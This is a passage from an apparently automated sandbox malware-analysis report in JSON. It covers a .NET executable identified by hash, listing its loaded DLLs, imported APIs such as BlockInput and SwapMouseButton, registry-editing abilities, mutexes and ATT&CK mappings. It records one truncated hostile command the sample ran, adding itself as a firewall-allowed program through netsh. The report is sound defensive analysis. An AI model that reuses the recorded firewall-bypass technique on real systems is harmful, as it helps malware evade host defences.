\"OLE32.DLL\" at base 76460000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"KERNEL32.DLL\" at base 77b80000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75f70000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"PROFAPI.DLL\" at base 75c40000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MSCORLIB\\9F895C66454577EFF9C77442D0C84F71\\MSCORLIB.NI.DLL\" at base 64970000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\OLE32.DLL\" at base 0\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"CRYPTBASE.DLL\" at base 75b30000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74850000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORJIT.DLL\" at base 6a930000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM\\AD92DAB7F418877D6A1E0358CE35658A\\SYSTEM.NI.DLL\" at base 641c0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MICROSOFT.VISUALBAS#\\6F5BF6427122BFC30B5BE76BCD651018\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 6a790000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.DRAWING\\CE3C98F2BF220EF17B0CF4233CAC6CEB\\SYSTEM.DRAWING.NI.DLL\" at base 68d40000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.WINDOWS.FORMS\\367E5B8A038AC76EBA17528BB7B3688E\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 635e0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"RPCRT4.DLL\" at base 77ed0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f70000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"CRYPTSP.DLL\" at base 75640000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 753d0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75bd0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"SHFOLDER.DLL\" at base 6cdf0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"KERNEL32\" at base 77b80000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"GDI32.DLL\" at base 778a0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.CONFIGURATION\\AD8DD536906E94C4BC9CB9B82285580B\\SYSTEM.CONFIGURATION.NI.DLL\" at base 62ed0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.XML\\77C1DC46EA139BF5E1EAA9B87EF03C7A\\SYSTEM.XML.NI.DLL\" at base 628e0000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\2.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"WS2_32.DLL\" at base 77c60000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75600000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 75160000\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 755f0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6c850000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c840000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77b80000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c260000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6bcc0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 68bc0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77b80000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6c180000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6a760000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6be30000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6bd30000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6bcb0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a6f0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 633e0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 63320000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 77ed0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 631c0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6c860000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 630b0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 62fd0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6bc80000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 62e20000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76460000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75b30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74850000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75640000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 77710000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 77ca0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c530000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76260000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f70000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 753d0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75bd0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6ef70000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75d70000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 75210000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75310000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FIREWALLAPI.DLL\" at base 750e0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-155", "relevance": 1, "name": "Contains ability to set file attributes (Dotnet)", "description": "Observed Namespace \"System.IO.File\" and MemberReference \"SetAttributes\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.IO.File\" and MemberReference \"GetAttributes\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter AdvApi32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System\\ad92dab7f418877d6a1e0358ce35658a\\System.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.VisualBas#\\6f5bf6427122bfc30b5be76bcd651018\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\ce3c98f2bf220ef17b0cf4233cac6ceb\\System.Drawing.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\367e5b8a038ac76eba17528bb7b3688e\\System.Windows.Forms.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter shfolder.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\ad8dd536906e94c4bc9cb9b82285580b\\System.Configuration.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\77c1dc46ea139bf5e1eaa9b87ef03c7a\\System.Xml.ni.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005756)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-101", "relevance": 1, "name": "Found Native API in Dotnet file", "description": "Observed unmanaged function \"FindWindowExA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"FindWindowA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"_SetWindowPos\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"_SendMessage\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SystemParametersInfoA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SetWindowPos_\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SendMessage_\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SendMessage\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"mciSendStringA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SetWindowPos\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SwapMouseButton\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"Beep\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"BlockInput_\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"BlockInput\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"ShowCursor\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"GetWindowThreadProcessId\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"GetForegroundWindow\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"GetClassNameA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"SendMessageA\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"GetWindowText\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed unmanaged function \"GetWindowTextLength\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77ED0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77ED0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"C:\\\\be71563bc45bed64a8291c357 ...\" (UID: 00000000-00005928)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"C:\\\\be71563bc45bed64a8291c357 ...\" (UID: 00000000-00005928)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" was detected as \".NET\" and name: \"Library\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKey\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\.net clr networking\"\n \"Global\\.net clr networking\"\n \"feaa05676842df64ef4fbb4064d4090b\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\feaa05676842df64ef4fbb4064d4090b\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75750000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75310000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" has flags like IMAGE_FILE_32BIT_MACHINE\n 